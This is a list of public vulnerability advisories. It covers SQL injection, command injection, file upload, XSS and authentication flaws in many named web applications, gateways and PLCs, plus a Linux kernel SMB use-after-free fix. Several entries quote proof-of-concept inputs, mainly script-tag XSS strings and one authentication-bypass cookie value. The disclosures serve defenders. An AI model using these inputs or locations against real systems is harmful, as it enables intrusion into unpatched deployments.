A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/firewall/addaddress_interpret.php. The manipulation of the argument messagecontent leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243591. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this issue is some unknown functionality of the file /protocol/firewall/uploadfirewall.php. The manipulation of the argument messagecontent leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-243590 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/system/approve_center/flow_sort/flow/delete.php. The manipulation of the argument id/sort_parent leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-243589 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.10. Affected is an unknown function of the file /manage/delete_query.php of the component General News. The manipulation of the argument NEWS_ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-243588. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Tongda OA 2017 11.10. This vulnerability affects unknown code of the file general/system/approve_center/flow_guide/flow_type/set_print/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-243586 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
An attacker with temporary script access to a site could have set a cookie containing invalid characters using `document.cookie` that could have led to unknown errors. This vulnerability affects Firefox &lt; 119.
A vulnerability was found in Viessmann Vitogate 300 up to 2.1.3.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/. The manipulation leads to direct request. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-243140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in vnotex vnote up to 3.17.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Markdown File Handler. The manipulation with the input &lt;xss onclick="alert(1)" style=display:block&gt;Click here&lt;/xss&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243139. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected is an unknown function of the file /protocol/iscgwtunnel/uploadiscgwrouteconf.php. The manipulation of the argument GWLinkId leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-243138 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in CodeAstro Internet Banking System 1.0. This issue affects some unknown processing of the file pages_view_client.php. The manipulation of the argument acc_name with the input Johnnie Reyes'"()&amp;%&lt;zzz&gt;&lt;ScRiPt &gt;alert(5646)&lt;/ScRiPt&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243137 was assigned to this vulnerability.
A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. This vulnerability affects unknown code of the file pages_deposit_money.php. The manipulation of the argument account_number with the input 421873905--&gt;&lt;ScRiPt%20&gt;alert(9523)&lt;/ScRiPt&gt;&lt;!-- leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-243136.
A vulnerability classified as problematic has been found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_withdraw_money.php. The manipulation of the argument account_number with the input 287359614--&gt;&lt;ScRiPt%20&gt;alert(1234)&lt;/ScRiPt&gt;&lt;!-- leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243135.
A vulnerability was found in CodeAstro Internet Banking System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file pages_transfer_money.php. The manipulation of the argument account_number with the input 357146928--&gt;&lt;ScRiPt%20&gt;alert(9206)&lt;/ScRiPt&gt;&lt;!-- leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-243134 is the identifier assigned to this vulnerability.
A vulnerability was found in CodeAstro Internet Banking System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file pages_reset_pwd.php. The manipulation of the argument email with the input testing%40example.com'%26%25&lt;ScRiPt%20&gt;alert(9860)&lt;/ScRiPt&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243133 was assigned to this vulnerability.
A vulnerability was found in CodeAstro Internet Banking System 1.0. It has been classified as problematic. Affected is an unknown function of the file pages_system_settings.php. The manipulation of the argument sys_name with the input &lt;ScRiPt &gt;alert(991)&lt;/ScRiPt&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-243132.
A vulnerability was found in CodeAstro Internet Banking System 1.0 and classified as critical. This issue affects some unknown processing of the file pages_reset_pwd.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243131.
A vulnerability was found in Byzoro Smart S85F Management Platform up to 20231012. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /importexport.php. The manipulation leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243061 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S85F Management Platform up to 20231010 and classified as critical. This issue affects some unknown processing of the file /sysmanage/importconf.php. The manipulation of the argument btn_file_renew leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243059. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Tongda OA 2017 and classified as critical. This vulnerability affects unknown code of the file general/hr/training/record/delete.php. The manipulation of the argument RECORD_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-243058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /admin/list_addr_fwresource_ip.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243057 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Judging Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-242188.
A vulnerability was found in SourceCodester Free Hospital Management System for Small Practices 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /vm/admin/doctors.php of the component Parameter Handler. The manipulation of the argument search leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-242186 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Motorcycle Rental System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/?page=bike of the component Bike List. The manipulation of the argument Model with the input "&gt;&lt;script&gt;confirm (document.cookie)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-242170 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in ZZZCMS 2.2.0. This issue affects some unknown processing of the component Personal Profile Page. The manipulation leads to basic cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-242147.
A vulnerability classified as problematic was found in SourceCodester Medicine Tracker System 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-242146 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Library System 1.0. This affects an unknown part of the file index.php. The manipulation of the argument category leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-242145 was assigned to this vulnerability.
A vulnerability was found in yhz66 Sandbox 6.1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /im/user/ of the component User Data Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-242144.
A vulnerability was found in Portábilis i-Educar up to 2.7.5. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file \intranet\agenda_imprimir.php of the component HTTP GET Request Handler. The manipulation of the argument cod_agenda with the input ");'&gt; &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-242143. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Tongda OA 2017 11.10. Affected is an unknown function of the file general/hr/salary/welfare_manage/delete.php. The manipulation of the argument WELFARE_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-241650 is the identifier assigned to this vulnerability.
A vulnerability was found in Translator PoqDev Add-On 1.0.11 on Firefox. It has been rated as problematic. This issue affects some unknown processing of the component Select Text Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-241649 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in QDocs Smart School 6.4.1. It has been classified as critical. This affects an unknown part of the file /course/filterRecords/ of the component HTTP POST Request Handler. The manipulation of the argument searchdata[0][title]/searchdata[0][searchfield]/searchdata[0][searchvalue] leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-241647. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928 and classified as critical. Affected by this issue is some unknown functionality of the file /log/download.php. The manipulation of the argument file leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-241646 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /useratte/web.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-241645 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928. Affected is an unknown function of the file /sysmanage/licence.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241644. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928. This issue affects some unknown processing of the file /sysmanage/updatelib.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-241643. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928. This vulnerability affects unknown code of the file /useratte/userattestation.php. The manipulation of the argument web_img leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-241642 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928. This affects an unknown part of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-241641 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928. It has been rated as critical. Affected by this issue is some unknown functionality of the file /sysmanage/updatelib.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241640. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in codeprojects Farmacia 1.0. Affected is an unknown function of the file index.php. The manipulation of the argument usario/senha leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241608.
A vulnerability was found in XINJE XDPPro up to 3.7.17a. It has been rated as critical. Affected by this issue is some unknown functionality in the library cfgmgr32.dll. The manipulation leads to uncontrolled search path. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-241586 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in XINJE XD5E-30R-E 3.5.3b. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Modbus Handler. The manipulation leads to denial of service. The exploit has been disclosed to the public and may be used. The identifier VDB-241585 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Delta Electronics WPLSoft 2.51. It has been classified as problematic. Affected is an unknown function of the component Modbus Handler. The manipulation leads to cleartext transmission of sensitive information. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241584. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Delta Electronics WPLSoft up to 2.51 and classified as problematic. This issue affects some unknown processing of the component Modbus Data Packet Handler. The manipulation leads to heap-based buffer overflow. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-241583. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Delta Electronics DVP32ES2 PLC 1.48 and classified as critical. This vulnerability affects unknown code of the component Password Transmission Handler. The manipulation leads to denial of service. The exploit has been disclosed to the public and may be used. VDB-241582 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/ajax.php?action=confirm_order. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-241384.
Improper Input Validation vulnerability in MegaBIP and already unsupported SmodBIP software allows for Stored XSS.This issue affects SmodBIP in all versions and MegaBIP in versions up to 4.36.2. MegaBIP 5.08 was tested and is not vulnerable. A precise range of vulnerable versions remains unknown.
A vulnerability classified as critical was found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this vulnerability is an unknown functionality of the file products.php. The manipulation of the argument c leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-241255.
A vulnerability classified as problematic was found in Field Logic DataCube4 up to 20231001. This vulnerability affects unknown code of the file /api/ of the component Web API. The manipulation leads to improper authentication. The exploit has been disclosed to the public and may be used. VDB-241030 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SATO CL4NX-J Plus 1.13.2-u455_r2. This affects an unknown part of the component Cookie Handler. The manipulation with the input auth=user,level1,settings; web=true leads to improper authentication. Access to the local network is required for this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-241029 was assigned to this vulnerability.
A vulnerability was found in SATO CL4NX-J Plus 1.13.2-u455_r2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /rest/dir/. The manipulation of the argument full leads to path traversal. The attack needs to be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241028.
A vulnerability was found in SATO CL4NX-J Plus 1.13.2-u455_r2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component WebConfig. The manipulation leads to improper authentication. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-241027.
A vulnerability has been found in eeroOS up to 6.16.4-11 and classified as critical. This vulnerability affects unknown code of the component Ethernet Interface. The manipulation leads to denial of service. The attack needs to be approached within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241024.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been rated as critical. Affected by this issue is some unknown functionality of the file /sysmanage/edit_manageadmin.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240992. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
A vulnerability classified as problematic was found in phpkobo Ajax Poll Script 3.18. Affected by this vulnerability is an unknown functionality of the file ajax-poll.php of the component Poll Handler. The manipulation leads to improper enforcement of a single, unique action. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240949 was assigned to this vulnerability.
A vulnerability was found in Online Banquet Booking System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /mail.php of the component Contact Us Page. The manipulation of the argument message leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-240944.
A vulnerability has been found in Online Banquet Booking System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /book-services.php of the component Service Booking. The manipulation of the argument message leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-240943.
A vulnerability, which was classified as problematic, was found in Online Banquet Booking System 1.0. Affected is an unknown function of the file /view-booking-detail.php of the component Account Detail Handler. The manipulation of the argument username leads to cross site scripting. It is possible to launch the attack remotely. VDB-240942 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Best Courier Management System 1.0. This issue affects some unknown processing of the component Manage Account Page. The manipulation of the argument First Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240941 was assigned to this vulnerability.
A vulnerability classified as critical has been found in TTSPlanning up to 20230925. This affects an unknown part. The manipulation of the argument uid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240939.
A vulnerability was found in Tongda OA 2017. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/hr/recruit/requirements/delete.php. The manipulation of the argument REQUIREMENTS_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-240938 is the identifier assigned to this vulnerability.
A vulnerability was found in Xinhu RockOA 1.1/2.3.2/15.X3amdi and classified as problematic. Affected by this issue is some unknown functionality of the file api.php?m=reimplat&amp;a=index of the component Password Handler. The manipulation leads to weak password recovery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-240926 is the identifier assigned to this vulnerability.
A vulnerability has been found in ECshop 4.1.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/order.php. The manipulation of the argument goods_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240925 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in ECshop 4.1.5. Affected is an unknown function of the file /admin/leancloud.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240924.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in BEECMS 4.0. This affects an unknown part of the file /admin/admin_content_tag.php?action=save_content. The manipulation of the argument tag leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240915. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability, which was classified as problematic, has been found in SourceCodester Expense Tracker App v1. Affected by this issue is some unknown functionality of the file add_category.php of the component Category Handler. The manipulation of the argument category_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-240914 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in Tongda OA 2017. Affected by this vulnerability is an unknown functionality of the file general/hr/recruit/recruitment/delete.php. The manipulation of the argument RECRUITMENT_ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-240913 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Engineers Online Portal 1.0. Affected is an unknown function of the file upload_save_student.php. The manipulation of the argument uploaded_file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240912.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file teacher_signup.php. The manipulation of the argument firstname/lastname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240911.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been declared as critical. This vulnerability affects unknown code of the file seed_message_student.php. The manipulation of the argument teacher_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-240910 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been classified as critical. This affects an unknown part of the file remove_inbox_message.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240909 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file my_students.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240908.
A vulnerability has been found in SourceCodester Engineers Online Portal 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file my_classmates.php. The manipulation of the argument teacher_class_student_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240907.
A vulnerability, which was classified as critical, was found in SourceCodester Engineers Online Portal 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument username/password leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-240906 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Engineers Online Portal 1.0. This issue affects some unknown processing of the file student_avatar.php. The manipulation of the argument change leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240905 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Engineers Online Portal 1.0. This vulnerability affects unknown code of the file downloadable_student.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-240904.
In the Linux kernel, the following vulnerability has been resolved: smb: client: fix use-after-free in smb2_query_info_compound() The following UAF was triggered when running fstests generic/072 with KASAN enabled against Windows Server 2022 and mount options 'multichannel,max_channels=2,vers=3.1.1,mfsymlinks,noperm' BUG: KASAN: slab-use-after-free in smb2_query_info_compound+0x423/0x6d0 [cifs] Read of size 8 at addr ffff888014941048 by task xfs_io/27534 CPU: 0 PID: 27534 Comm: xfs_io Not tainted 6.6.0-rc7 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014 Call Trace: dump_stack_lvl+0x4a/0x80 print_report+0xcf/0x650 ? srso_alias_return_thunk+0x5/0x7f ? srso_alias_return_thunk+0x5/0x7f ? __phys_addr+0x46/0x90 kasan_report+0xda/0x110 ? smb2_query_info_compound+0x423/0x6d0 [cifs] ? smb2_query_info_compound+0x423/0x6d0 [cifs] smb2_query_info_compound+0x423/0x6d0 [cifs] ? __pfx_smb2_query_info_compound+0x10/0x10 [cifs] ? srso_alias_return_thunk+0x5/0x7f ? __stack_depot_save+0x39/0x480 ? kasan_save_stack+0x33/0x60 ? kasan_set_track+0x25/0x30 ? ____kasan_slab_free+0x126/0x170 smb2_queryfs+0xc2/0x2c0 [cifs] ? __pfx_smb2_queryfs+0x10/0x10 [cifs] ? __pfx___lock_acquire+0x10/0x10 smb311_queryfs+0x210/0x220 [cifs] ? __pfx_smb311_queryfs+0x10/0x10 [cifs] ? srso_alias_return_thunk+0x5/0x7f ? __lock_acquire+0x480/0x26c0 ? lock_release+0x1ed/0x640 ? srso_alias_return_thunk+0x5/0x7f ? do_raw_spin_unlock+0x9b/0x100 cifs_statfs+0x18c/0x4b0 [cifs] statfs_by_dentry+0x9b/0xf0 fd_statfs+0x4e/0xb0 __do_sys_fstatfs+0x7f/0xe0 ? __pfx___do_sys_fstatfs+0x10/0x10 ? srso_alias_return_thunk+0x5/0x7f ? lockdep_hardirqs_on_prepare+0x136/0x200 ? srso_alias_return_thunk+0x5/0x7f do_syscall_64+0x3f/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Allocated by task 27534: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 __kasan_kmalloc+0x8f/0xa0 open_cached_dir+0x71b/0x1240 [cifs] smb2_query_info_compound+0x5c3/0x6d0 [cifs] smb2_queryfs+0xc2/0x2c0 [cifs] smb311_queryfs+0x210/0x220 [cifs] cifs_statfs+0x18c/0x4b0 [cifs] statfs_by_dentry+0x9b/0xf0 fd_statfs+0x4e/0xb0 __do_sys_fstatfs+0x7f/0xe0 do_syscall_64+0x3f/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Freed by task 27534: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x50 ____kasan_slab_free+0x126/0x170 slab_free_freelist_hook+0xd0/0x1e0 __kmem_cache_free+0x9d/0x1b0 open_cached_dir+0xff5/0x1240 [cifs] smb2_query_info_compound+0x5c3/0x6d0 [cifs] smb2_queryfs+0xc2/0x2c0 [cifs] This is a race between open_cached_dir() and cached_dir_lease_break() where the cache entry for the open directory handle receives a lease break while creating it. And before returning from open_cached_dir(), we put the last reference of the new @cfid because of !@cfid-&gt;has_lease. Besides the UAF, while running xfstests a lot of missed lease breaks have been noticed in tests that run several concurrent statfs(2) calls on those cached fids CIFS: VFS: \\w22-root1.gandalf.test No task to wake, unknown frame... CIFS: VFS: \\w22-root1.gandalf.test Cmd: 18 Err: 0x0 Flags: 0x1... CIFS: VFS: \\w22-root1.gandalf.test smb buf 00000000715bfe83 len 108 CIFS: VFS: Dump pending requests: CIFS: VFS: \\w22-root1.gandalf.test No task to wake, unknown frame... CIFS: VFS: \\w22-root1.gandalf.test Cmd: 18 Err: 0x0 Flags: 0x1... CIFS: VFS: \\w22-root1.gandalf.test smb buf 000000005aa7316e len 108 ... To fix both, in open_cached_dir() ensure that @cfid-&gt;has_lease is set right before sending out compounded request so that any potential lease break will be get processed by demultiplex thread while we're still caching @cfid. And, if open failed for some reason, re-check @cfid-&gt;has_lease to decide whether or not put lease reference.
A vulnerability classified as problematic was found in SourceCodester Best Courier Management System 1.0. This vulnerability affects unknown code of the file manage_parcel_status.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-240886 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. This affects an unknown part of the file edit_parcel.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-240885 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Best Courier Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file edit_parcel.php. The manipulation of the argument email leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240884.
A vulnerability was found in SourceCodester Best Courier Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file view_parcel.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240883.
A vulnerability was found in SourceCodester Best Courier Management System 1.0. It has been classified as critical. Affected is an unknown function of the file parcel_list.php of the component GET Parameter Handler. The manipulation of the argument s leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-240882 is the identifier assigned to this vulnerability.
A vulnerability was found in DedeBIZ 6.2 and classified as critical. This issue affects some unknown processing of the file /src/admin/makehtml_taglist_action.php. The manipulation of the argument mktime leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240881 was assigned to this vulnerability.
A vulnerability has been found in Tongda OA 2017 and classified as critical. This vulnerability affects unknown code of the file general/hr/recruit/hr_pool/delete.php. The manipulation of the argument EXPERT_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-240880.
A vulnerability, which was classified as critical, was found in DedeBIZ 6.2. This affects an unknown part of the file /src/admin/tags_main.php. The manipulation of the argument ids leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240879.
